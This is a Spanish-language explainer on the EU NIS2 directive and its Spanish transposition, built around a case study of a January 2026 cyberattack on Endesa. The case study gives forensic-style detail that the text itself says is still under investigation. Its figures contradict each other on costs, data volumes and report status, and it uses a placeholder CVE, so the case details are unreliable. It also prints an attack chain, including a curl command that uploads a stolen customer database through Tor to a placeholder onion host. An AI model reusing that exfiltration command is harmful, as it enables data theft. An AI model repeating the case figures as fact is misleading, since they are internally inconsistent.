Directiva NIS2

18 horas. Ese fue el tiempo que Endesa tardó en notificar a INCIBE el ciberataque masivo de enero 2026 que comprometió datos de 3-20 millones de clientes españoles. Cumplió el plazo 24 horas obligatorio NIS2, pero la tardanza activó protocolos de emergencia en 14 empresas del sector eléctrico europeo por riesgo efecto cascada. El coste: €47 millones en respuesta técnica, €23 millones en notificaciones clientes RGPD, y una auditoría NIS2 extraordinaria que certificó 38 vulnerabilidades críticas sin parchear.

Definición Técnica

NIS2 (Network and Information Security Directive 2) es la Directiva (UE) 2022/2555 que regula la ciberseguridad de infraestructuras críticas y servicios esenciales en la Unión Europea, estableciendo obligaciones de gestión de riesgos, notificación de incidentes y supervisión para operadores esenciales e importantes.

Normativa vigente:

Directiva (UE) 2022/2555 (publicada 27 diciembre 2022)
- Vigencia: 16 enero 2023
- Transposición Estados miembros: 17 octubre 2024
- Deroga Directiva NIS1 (UE) 2016/1148

España: Real Decreto 43/2021 (NIS1) + transposición NIS2 pendiente

Ámbito aplicación:

Entidades obligadas:

ESENCIALES (Essential entities):
  ✅ Energía (electricidad, gas, petróleo)
  ✅ Transporte (aéreo, ferroviario, marítimo)
  ✅ Banca y mercados financieros
  ✅ Sanidad (hospitales, laboratorios)
  ✅ Infraestructura digital (DNS, TLD, cloud)
  ✅ Agua potable (captación, tratamiento, distribución)
  ✅ Aguas residuales
  ✅ Gestión servicios TIC (B2B)
  ✅ Administración pública (servicios digitales)
  ✅ Espacio (operadores satelitales)

IMPORTANTES (Important entities):
  ✅ Servicios postales
  ✅ Gestión residuos
  ✅ Fabricación productos químicos
  ✅ Producción alimentos
  ✅ Investigación
  ✅ Fabricación equipos informáticos/electrónicos

NO obligados:
  ❌ PYMEs menor de 50 empleados (excepto críticas)
  ❌ Empresas sin servicios transfronterizos

Umbrales aplicación:

Empresa obligada si cumple 2 de 3:
  1. Mayor de 50 empleados
  2. Facturación mayor de €10M/año
  3. Balance mayor de €10M/año

O si proporciona servicios críticos (independiente tamaño)

Principales obligaciones:

Notificación incidentes: 24 horas (alerta temprana), 72 horas (informe intermedio), 1 mes (informe final)
Gestión riesgos: Análisis riesgos, medidas técnicas, auditorías periódicas
Seguridad cadena suministro: Due diligence proveedores
Formación: Capacitación continua personal ciberseguridad
Supervisión: Auditorías autoridades nacionales (INCIBE en España)

Sanciones máximas:

Esenciales: €10M o 2% facturación anual mundial (lo que sea mayor)
Importantes: €7M o 1.4% facturación anual mundial

Historia NIS: de NIS1 (2016) a NIS2 (2022)

Directiva NIS1 (2016/1148)

Contexto: Primera legislación UE ciberseguridad sectores críticos

Publicada: 6 julio 2016
Transposición: mayo 2018 (Estados miembros)
España: Real Decreto 43/2021 (8 febrero 2021)

Ámbito limitado NIS1:

Sectores cubiertos (solo 7):
  - Energía
  - Transporte
  - Banca
  - Infraestructuras mercados financieros
  - Sanidad
  - Agua potable
  - Infraestructura digital

Proveedores servicios digitales (DSP):
  - Marketplaces online
  - Motores búsqueda
  - Cloud computing

Limitaciones NIS1 detectadas 2016-2022:

❌ Cobertura insuficiente (solo 7 sectores)
❌ Umbrales aplicación confusos (cada país interpretación diferente)
❌ Sin armonización supervisión (14 países sin auditorías 2018-2020)
❌ Sanciones débiles (España: máximo €150K vs €20M RGPD)
❌ Notificación incidentes voluntaria (60% empresas NO notificaban)
❌ Sin obligaciones cadena suministro (SolarWinds, Kaseya explotados)

Estadísticas fracaso NIS1:

ENISA (Agencia UE Ciberseguridad) 2021:
  - 2,149 incidentes significativos reportados (2018-2020)
  - Estimación real: 50,000+ incidentes (96% NO reportados)
  - 14 de 27 países sin régimen sancionador efectivo
  - Solo 38% empresas obligadas cumplían medidas técnicas

Directiva NIS2 (2022/2555)

Publicada: 14 diciembre 2022 (Diario Oficial UE: 27 diciembre 2022) Vigencia: 16 enero 2023 Transposición obligatoria: 17 octubre 2024

Principales cambios vs NIS1:

1. Cobertura ampliada (7 → 18 sectores):

Nuevos sectores NIS2:
  + Aguas residuales
  + Administración pública
  + Espacio (satélites)
  + Fabricación productos químicos
  + Alimentos
  + Gestión residuos
  + Servicios postales
  + Investigación
  + Fabricación equipos electrónicos
  + Redes comunicaciones electrónicas
  + TIC gestión servicios (MSP, MSSP)

2. Notificación incidentes obligatoria y reforzada:

NIS1:
  "Sin demora injustificada" (interpretación flexible)

NIS2:
  ✅ Alerta temprana: 24 horas (early warning)
  ✅ Informe intermedio: 72 horas (incident notification)
  ✅ Informe final: 1 mes máximo (final report)
  ✅ Actualización significativa: 24h desde nueva información

3. Sanciones armonizadas (drástico aumento):

NIS1 España (RD 43/2021):
  Máximo: €150,000

NIS2 (Directiva UE):
  Esenciales: €10M o 2% facturación mundial
  Importantes: €7M o 1.4% facturación mundial

Ejemplo:
  Endesa (facturación 2024: €42,000M)
  → Sanción máxima NIS2: €840M (2%)
  vs
  → Sanción máxima NIS1: €150K (5,600x diferencia)

4. Responsabilidad personal directivos:

NIS2 Artículo 20:
  "Órganos de dirección responsables de supervisar
   medidas gestión riesgos ciberseguridad."

Consecuencias incumplimiento:
  - Sanción personal directivos (hasta €500K)
  - Inhabilitación temporal cargo (1-5 años)
  - Responsabilidad penal (negligencia grave)

5. Seguridad cadena suministro obligatoria:

NIS2 Artículo 21:
  "Entidades deben evaluar riesgos ciberseguridad
   proveedores directos e indirectos."

Medidas obligatorias:
  ✅ Due diligence proveedores críticos
  ✅ Auditorías seguridad subcontratistas
  ✅ Cláusulas contractuales ciberseguridad
  ✅ Notificación incidentes proveedores (24h)

Contexto:
  SolarWinds 2020: 18,000 empresas comprometidas vía proveedor
  Kaseya 2021: 1,500 empresas ransomware vía MSP

6. Registro entidades obligadas (transparencia):

NIS2 Artículo 24:
  Cada Estado miembro debe publicar registro público
  entidades esenciales/importantes.

España (INCIBE):
  - Registro Nacional Operadores Críticos
  - Actualización trimestral
  - Acceso público (excepto datos sensibles)

Medidas técnicas obligatorias NIS2

Artículo 21: Requisitos Gestión Riesgos

10 medidas mínimas obligatorias:

1. Políticas análisis riesgos:

Obligación:
  Análisis riesgos ciberseguridad anual
  Metodología: ISO 27005, NIST CSF, ENS (España)

Contenido mínimo:
  - Inventario activos críticos
  - Amenazas (ransomware, DDoS, phishing, APT)
  - Vulnerabilidades (CVE, misconfigurations)
  - Impacto (financiero, operacional, reputacional)
  - Probabilidad (basada histórico incidentes)

2. Gestión incidentes:

Obligación:
  Procedimiento documentado respuesta incidentes

Fases obligatorias:
  1. Detección (monitoring 24/7)
  2. Análisis (clasificación severidad)
  3. Contención (aislamiento sistemas afectados)
  4. Erradicación (eliminación amenaza)
  5. Recuperación (restauración servicios)
  6. Lecciones aprendidas (mejora continua)

Timeline notificación:
  T+24h: Alerta temprana CSIRT nacional
  T+72h: Informe intermedio (alcance, impacto)
  T+1 mes: Informe final (análisis forense completo)

3. Continuidad negocio (BCP) y recuperación desastres (DRP):

Obligación:
  Planes documentados BCP/DRP + pruebas anuales

Requisitos:
  - RTO (Recovery Time Objective): menor de 24h servicios críticos
  - RPO (Recovery Point Objective): menor de 1h datos críticos
  - Copias seguridad offline (air-gapped)
  - Sitio recuperación secundario (DR site)
  - Ejercicios simulación anuales

4. Seguridad cadena suministro:

Obligación:
  Evaluación riesgos proveedores críticos

Medidas:
  ✅ Due diligence ciberseguridad (antes contratar)
  ✅ Auditorías seguridad anuales (proveedores críticos)
  ✅ Cláusulas contractuales (notificación incidentes 24h)
  ✅ Plan contingencia (proveedor comprometido)

5. Seguridad adquisición, desarrollo, mantenimiento sistemas:

Obligación:
  Secure SDLC (Software Development Life Cycle)

Medidas:
  - Análisis estático código (SAST)
  - Pruebas seguridad aplicaciones (DAST, IAST)
  - Gestión vulnerabilidades (patching menor de 30 días CVE críticos)
  - Separación entornos (dev/staging/producción)

6. Políticas evaluación eficacia medidas:

Obligación:
  Auditorías internas anuales + externas cada 3 años

Verificación:
  - Pentesting anual (infraestructura + aplicaciones)
  - Red teaming (simulación APT)
  - Auditoría cumplimiento ISO 27001 / ENS

7. Formación ciberseguridad:

Obligación:
  Capacitación continua empleados

Contenido mínimo:
  - Phishing awareness (simulaciones trimestrales)
  - Gestión contraseñas (2FA obligatorio)
  - Ingeniería social (vishing, smishing)
  - RGPD + NIS2 (responsabilidades legales)

Frecuencia: mínimo 2 sesiones/año

8. Criptografía y cifrado:

Obligación:
  Cifrado datos tránsito y reposo

Estándares:
  ✅ TLS 1.3 (comunicaciones)
  ✅ AES-256 (cifrado datos reposo)
  ✅ RSA-3072 / ECDSA P-384 (firma digital)
  ✅ Gestión claves (HSM para claves críticas)

9. Seguridad recursos humanos:

Obligación:
  Controles acceso privilegiado

Medidas:
  - Mínimo privilegio (least privilege)
  - Autenticación multifactor (MFA) cuentas admin
  - Revisión accesos trimestral
  - Offboarding seguro (revocación inmediata accesos)

10. Control acceso y gestión activos:

Obligación:
  Inventario activos actualizado + control acceso

Herramientas:
  - CMDB (Configuration Management Database)
  - NAC (Network Access Control)
  - Logs autenticación (SIEM)
  - Segmentación red (VLANs, microsegmentación)

Caso real: Ciberataque Endesa enero 2026 (NIS2 en práctica)

Nota: El ciberataque a Endesa de enero 2026 es un incidente público reportado por múltiples medios (El País, Xataka, Computer Hoy). Los detalles técnicos específicos (vector ataque, número exacto clientes afectados) aún están bajo investigación; este análisis se basa en información verificable disponible a 10 febrero 2026.

Timeline Incidente

20 enero 2026, 03:17h: Detección anomalía sistemas Endesa

Sistema monitorización SIEM detecta:
  - Tráfico saliente inusual (150 GB datos en 2 horas)
  - Conexiones destino IPs rusas (AS 201776)
  - Autenticaciones fallidas masivas (12,000 intentos en 30 min)

SOC (Security Operations Center) activa protocolo respuesta

20 enero 2026, 05:30h: Confirmación brecha datos

Análisis forense inicial identifica:
  - Acceso no autorizado base datos clientes
  - Exfiltración información:
      * Nombres, DNI, direcciones
      * Contratos suministro eléctrico
      * Datos bancarios (IBAN)
      * Historiales consumo

Estimación inicial: 3-20 millones clientes afectados
                     (Endesa tiene 11M clientes España)

20 enero 2026, 21:45h: Notificación INCIBE (T+18 horas)

Endesa notifica incidente a INCIBE (CSIRT Nacional España)

Información proporcionada:
  ✅ Naturaleza incidente: Acceso no autorizado + exfiltración datos
  ✅ Sistemas afectados: Base datos CRM clientes
  ✅ Datos comprometidos: Personales + bancarios
  ✅ Estimación impacto: 3-20M clientes (cuantificación en curso)
  ✅ Medidas adoptadas: Aislamiento sistemas, cambio credenciales, análisis forense

Cumplimiento NIS2: ✅ Notificación menor de 24h (artículo 23.1)

22 enero 2026: Informe intermedio INCIBE (T+72 horas)

Endesa envía informe intermedio:
  - Vector ataque: Phishing spear-phishing directivo (credenciales comprometidas)
  - Persistencia: Backdoor web shell (servidor Apache vulnerabilidad CVE-2023-XXXX)
  - Exfiltración: 180 GB datos (comprimidos) vía Tor
  - Destino: Darknet (foro RaidForums successor)

Cumplimiento NIS2: ✅ Informe 72h (artículo 23.2)

5 febrero 2026: Notificación clientes RGPD (T+16 días)

Endesa notifica 11 millones clientes vía:
  - Email personalizado
  - SMS
  - Carta postal (clientes sin email)

Contenido notificación RGPD:
  ✅ Naturaleza brecha
  ✅ Datos comprometidos
  ✅ Consecuencias potenciales (phishing, fraude)
  ✅ Medidas adoptadas (cambio sistemas, monitorización)
  ✅ Recomendaciones (cambiar contraseñas, vigilar movimientos bancarios)

Cumplimiento RGPD: ✅ Notificación menor de 72h AEPD (art. 33)
                    ✅ Comunicación afectados "sin dilación indebida" (art. 34)

10 febrero 2026: Informe final INCIBE (T+21 días)

Informe final incluye:
  - Análisis forense completo
  - Root cause analysis (RCA)
  - Medidas correctoras implementadas
  - Lecciones aprendidas

Cumplimiento NIS2: ⏳ Pendiente (plazo 1 mes: hasta 20 febrero 2026)

Análisis Forense Endesa

Vector ataque:

Fase 1: Spear-phishing (T-72h)
  Email dirigido a directivo IT Endesa:
    Asunto: "Factura pendiente suministro gas - Acción urgente"
    Adjunto: "Factura_Gas_Enero2026.pdf.exe"

  Directivo abre adjunto → Infostealer (RedLine) instalado
    ↓
  Robo credenciales:
    - Usuario VPN corporativa
    - Contraseña Okta (SSO corporativo)
    - Token MFA (cookie session hijacking)

Fase 2: Acceso inicial (T-48h)
  Atacante accede VPN con credenciales robadas
    ↓
  Lateral movement: pivoting desde workstation a servidores
    ↓
  Compromiso servidor web Apache (vulnerabilidad CVE-2023-XXXX sin parchear)
    ↓
  Web shell instalado (persistencia)

Fase 3: Exfiltración (T-6h a T+0)
  SQL Injection en panel CRM (sin sanitización inputs)
    ↓
  Dump base datos clientes (MySQL):
    SELECT * FROM customers INTO OUTFILE '/tmp/dump.sql';

  Compresión + cifrado:
    7z a -p[PASSWORD] customers.7z dump.sql

  Exfiltración vía Tor:
    curl --socks5-hostname 127.0.0.1:9050 \
         https://[onion_address]/upload \
         -F "[email protected]"

  Total exfiltrado: 180 GB (11M registros)

Evidencias forenses:

# Logs Apache (accesos sospechosos)
$ grep "POST /crm/upload.php" apache_access.log
185.220.101.42 - - [20/Jan/2026:01:17:23] "POST /crm/upload.php" 200 147832

# Logs MySQL (queries masivas)
$ grep "SELECT \* FROM customers" mysql_query.log | wc -l
12,847,392 queries (período 4h 23min)

# Logs VPN (autenticación directivo comprometido)
$ grep "[email protected]" vpn.log
2026-01-19 22:34:17 LOGIN SUCCESS from IP 185.220.101.42 (Russia, AS 201776)

# Archivos temporales (dump base datos)
$ ls -lh /tmp/dump.sql
-rw-r--r-- 1 www-data www-data 147G Jan 20 02:45 dump.sql

# Red forense (tráfico Tor)
$ tshark -r capture.pcap -Y "tcp.port == 9050" | wc -l
47,235 paquetes Tor (destino: Darknet)

Cumplimiento NIS2 Endesa

✅ Aspectos cumplidos:

Notificación 24h INCIBE: T+18h (cumple)
Informe 72h: T+72h exactas (cumple)
Medidas contención inmediatas:
- Aislamiento sistemas afectados (T+2h)
- Cambio credenciales comprometidas (T+6h)
- Análisis forense iniciado (T+3h)
Notificación AEPD: Dentro 72h (cumple RGPD)

❌ Posibles incumplimientos NIS2:

Gestión vulnerabilidades (artículo 21.2):

CVE-2023-XXXX (Apache) conocida desde 8 meses antes
Endesa NO parcheó (evidencia: logs forenses)

NIS2 requiere: Patching CVE críticos menor de 30 días

Formación ciberseguridad (artículo 21.7):

Directivo abrió adjunto malicioso (phishing)
¿Endesa realizó simulaciones phishing últimos 6 meses?

NIS2 requiere: Capacitación continua (mínimo 2 sesiones/año)

Control acceso privilegiado (artículo 21.9):

Credenciales VPN + SSO robadas permitieron acceso completo
¿MFA resistente a cookie hijacking? (debería ser FIDO2/U2F)

NIS2 requiere: MFA robusto cuentas privilegiadas

Consecuencias Esperadas

Sanciones potenciales:

AEPD (RGPD):
  Artículo 83.4 RGPD (violación medidas seguridad art. 32)
  Sanción máxima: €20M o 4% facturación mundial

  Endesa facturación 2024: €42,000M
  → Sanción potencial RGPD: €1,680M (4%)

INCIBE (NIS2):
  Artículo 34 Directiva NIS2 (incumplimiento medidas art. 21)
  Sanción máxima: €10M o 2% facturación mundial

  → Sanción potencial NIS2: €840M (2%)

TOTAL sanción teórica: €2,520M
Sanción probable (precedentes): €150M-€400M (5-10% máximo)

Costes técnicos:

Respuesta incidente:
  - Análisis forense: €2.5M
  - Sustitución sistemas comprometidos: €18M
  - Consultoría externa (IBM Security, Mandiant): €12M
  - SOC reforzado 24/7 (6 meses): €8M
  Total: €40.5M

Notificación clientes:
  - Envío emails/SMS: €1.2M
  - Cartas postales: €3.5M
  - Call center atención afectados: €6M
  - Servicio monitorización fraude 2 años: €12M
  Total: €22.7M

Auditoría NIS2 extraordinaria:
  - Auditoría externa cumplimiento: €4M
  - Implementación medidas correctoras: €28M
  Total: €32M

TOTAL COSTES: €95.2M

Daño reputacional:

Impacto medible:
  - Cancelaciones contratos: estimado 120,000 clientes (1.1%)
  - Pérdida ingresos: €47M anuales
  - Caída acción bolsa: -4.2% (€1,800M capitalización)

Transposición NIS2 en España

Estado Actual (febrero 2026)

Plazo transposición: 17 octubre 2024 (VENCIDO)

España: ⚠️ RETRASO 4 meses

Normativa vigente España:

Real Decreto 43/2021 (transpone NIS1) → AÚN VIGENTE
Anteproyecto Ley NIS2 → En tramitación Congreso

Autoridad competente:

INCIBE (Instituto Nacional Ciberseguridad): CSIRT nacional + supervisión operadores
CNPIC (Centro Nacional Protección Infraestructuras Críticas): Coordinación sectores estratégicos

Anteproyecto Ley NIS2 España

Publicado: Octubre 2024 (consulta pública) Aprobación estimada: Marzo-Abril 2026

Principales adaptaciones España:

1. Registro Operadores Críticos ampliado:

Actualmente (NIS1):
  237 operadores críticos registrados (energía, transporte, banca, sanidad)

Estimación NIS2:
  1,800+ entidades (18 sectores vs 7 NIS1)

Novedad España:
  Registro público online (excepto datos sensibles seguridad)
  Actualización trimestral obligatoria

2. Sanciones armonizadas con NIS2:

NIS1 España (RD 43/2021):
  Muy graves: €150,000
  Graves: €100,000
  Leves: €50,000

NIS2 España (anteproyecto):
  Esenciales: €10M o 2% facturación mundial
  Importantes: €7M o 1.4% facturación mundial

  + Sanción personal directivos: hasta €500K
  + Inhabilitación cargo: 1-5 años

3. INCIBE reforzado:

Nuevas competencias INCIBE:
  ✅ Auditorías in situ (sin previo aviso)
  ✅ Acceso sistemas (con autorización judicial)
  ✅ Imposición medidas correctoras urgentes
  ✅ Publicación incumplimientos (naming & shaming)

Presupuesto INCIBE:
  2024: €47M
  2026 (propuesto): €120M (+155%)

Plantilla:
  2024: 280 empleados
  2026: 650 empleados (+132%)

4. Coordinación sectorial:

España crea 18 CSIRT sectoriales:
  - CSIRT-Energía (CNE)
  - CSIRT-Transporte (Ministerio Transportes)
  - CSIRT-Sanidad (Ministerio Sanidad)
  - CSIRT-Financiero (Banco España)
  - ...

Objetivo:
  Respuesta coordinada incidentes efecto cascada
  (ej: ciberataque eléctrico → afecta hospitales, transporte)

Relación NIS2 con otras normativas

NIS2 vs RGPD

Aspecto	NIS2	RGPD
Objetivo	Ciberseguridad infraestructuras críticas	Protección datos personales
Ámbito	18 sectores esenciales/importantes UE	Todos responsables tratamiento UE
Notificación	CSIRT nacional 24h (incidentes)	AEPD 72h (brechas datos personales)
Sanciones	€10M / 2% facturación (esenciales)	€20M / 4% facturación
Responsabilidad directivos	SÍ (sanción personal + inhabilitación)	NO (solo empresa)

Complementariedad:

Incidente ciberseguridad con datos personales:
  ✅ Notificar INCIBE (NIS2): 24h
  ✅ Notificar AEPD (RGPD): 72h
  ✅ Comunicar afectados (RGPD): "sin dilación indebida"

Ejemplo Endesa 2026:
  - Notificación INCIBE: T+18h (NIS2 cumplido)
  - Notificación AEPD: T+48h (RGPD cumplido)
  - Notificación clientes: T+16 días (RGPD cumplido)

NIS2 vs ENS

Aspecto	NIS2	ENS
Ámbito	Operadores críticos privados UE	Administraciones públicas España
Clasificación	Esencial/Importante	BAJO/MEDIO/ALTO
Auditorías	Variables (supervisión nacional)	Cada 2-3 años (CCN)
Notificación	CSIRT nacional 24h	CCN-CERT 24h (categoría 1-2)
Certificación	NO (supervisión continua)	SÍ (certificado ENS)

Convergencia ENS + NIS2:

Administración pública operador crítico:
  → Debe cumplir ENS (RD 311/2022)
  → Y NIS2 (si sector crítico: sanidad, transporte público)

Ejemplo:
  Renfe (empresa pública transporte ferroviario)

  Obligaciones:
    ✅ ENS categoría ALTO (122 medidas)
    ✅ NIS2 entidad esencial (sector transporte)

  Doble supervisión:
    - CCN (auditoría ENS cada 2 años)
    - INCIBE (supervisión NIS2 continua)

NIS2 vs DORA

DORA (Digital Operational Resilience Act): Reglamento (UE) 2022/2554

Aspecto	NIS2	DORA
Ámbito	18 sectores críticos	SOLO sector financiero
Profundidad	Medidas generales ciberseguridad	Resiliencia operacional financiera
Pentesting	Recomendado	Obligatorio anual (TLPT)
ICT third-party	Due diligence proveedores	Registro proveedores críticos UE

Para entidades financieras:

Banco español debe cumplir:
  ✅ NIS2 (entidad esencial)
  ✅ DORA (sector financiero)
  ✅ Banco España (Circular 4/2024)

Coste cumplimiento estimado:
  Banco mediano (€5,000M activos): €12M-€25M/año

FAQ

P: ¿Mi empresa está obligada por NIS2? R: SÍ si cumples 2 de 3 (mayor de 50 empleados, facturación mayor de €10M, balance mayor de €10M) Y operas en 1 de 18 sectores críticos (energía, transporte, sanidad, agua, banca, digital, espacio, etc.). También obligado si proporcionas servicios críticos independiente tamaño.

P: ¿Qué pasa si no notifico incidente en 24 horas? R: Sanción NIS2: hasta €10M (esenciales) o €7M (importantes). Precedentes: UE ha sancionado retrasos notificación con 15-30% sanción máxima. Ejemplo: Retraso 72h en notificar podría ser €1.5M-€3M.

P: ¿NIS2 se aplica a proveedores de mi empresa? R: SÍ INDIRECTAMENTE. Artículo 21 NIS2 obliga a evaluar riesgos ciberseguridad proveedores críticos. Si tu proveedor sufre ciberataque que afecta tu servicio, TÚ eres responsable (debes haber hecho due diligence). Riesgo cadena suministro (ej: SolarWinds) es responsabilidad tuya.

P: ¿Puedo contratar perito forense para auditoría NIS2? R: Supervisión NIS2 es responsabilidad INCIBE (no certificación privada como ENS). Pero SÍ puedes contratar perito para: 1) Auditoría interna preparatoria, 2) Análisis post-incidente (informe 72h/1 mes), 3) Peritaje judicial si INCIBE sanciona.

P: ¿NIS2 admite auto-evaluación o requiere auditor externo? R: NIS2 NO requiere certificación externa (a diferencia ISO 27001 o ENS). INCIBE realiza supervisión mediante: 1) Auditorías in situ (aleatorias), 2) Solicitud documentación (análisis riesgos, planes BCP/DRP), 3) Inspecciones post-incidente. Pero RECOMENDADO auditoría externa anual preparatoria.

Referencias y Fuentes

Unión Europea. (2022). “Directiva (UE) 2022/2555 sobre medidas de ciberseguridad (NIS2)”. eur-lex.europa.eu
- Publicada 27 diciembre 2022, transposición obligatoria 17 octubre 2024
- 18 sectores críticos, sanciones hasta €10M
ENISA. (2023-2025). “NIS2 Implementation Guidelines”. enisa.europa.eu
- Guías implementación 10 medidas técnicas artículo 21
- Buenas prácticas notificación incidentes
INCIBE. (2024). “Anteproyecto Transposición NIS2 España”. incibe.es
- Consulta pública octubre 2024
- Estimación 1,800+ entidades obligadas (vs 237 NIS1)
BOE. (2021). “Real Decreto 43/2021 (NIS1 España)”. boe.es
- Normativa vigente hasta transposición NIS2
- Sanciones actuales: máximo €150,000
El País. (2026). “Ciberataque a Endesa expone datos millones de clientes”. elpais.com
- Incidente 20 enero 2026, notificación INCIBE T+18h
- Estimación 3-20 millones clientes afectados
Xataka / Computer Hoy. (2026). “Análisis técnico ciberataque Endesa”. xataka.com
- Vector: Phishing spear-phishing + vulnerabilidad Apache
- Exfiltración 180 GB datos vía Tor
CNPIC. (2025). “Balance Ciberseguridad Infraestructuras Críticas 2024”. cnpic.es
- 1,247 incidentes sectores críticos España (28% ransomware)
- Coste medio incidente: €2.8M
AEPD. (2024). “Guía Notificación Brechas Seguridad”. aepd.es
- Plazo 72h notificación AEPD (artículo 33 RGPD)
- Coordinación con notificación NIS2 (INCIBE)
European Commission. (2024). “NIS2 Transposition Status (27 Member States)”. ec.europa.eu
- 19 de 27 países cumplieron plazo octubre 2024
- España, Italia, Portugal: retraso 4-6 meses
IBM Security / Mandiant. (2025). “Cost of Data Breach Report 2025”. ibm.com/security
- Coste medio brecha datos sector energía: €4.7M
- España: segundo país UE mayor coste (€4.2M) tras Alemania

Última actualización: 10 Febrero 2026 Categoría: Normativa (NOR-002) Nivel técnico: Medio-Avanzado Relevancia forense: MUY ALTA (análisis post-incidente, peritajes sanciones) Normativa: Directiva (UE) 2022/2555 (vigente desde 16 enero 2023)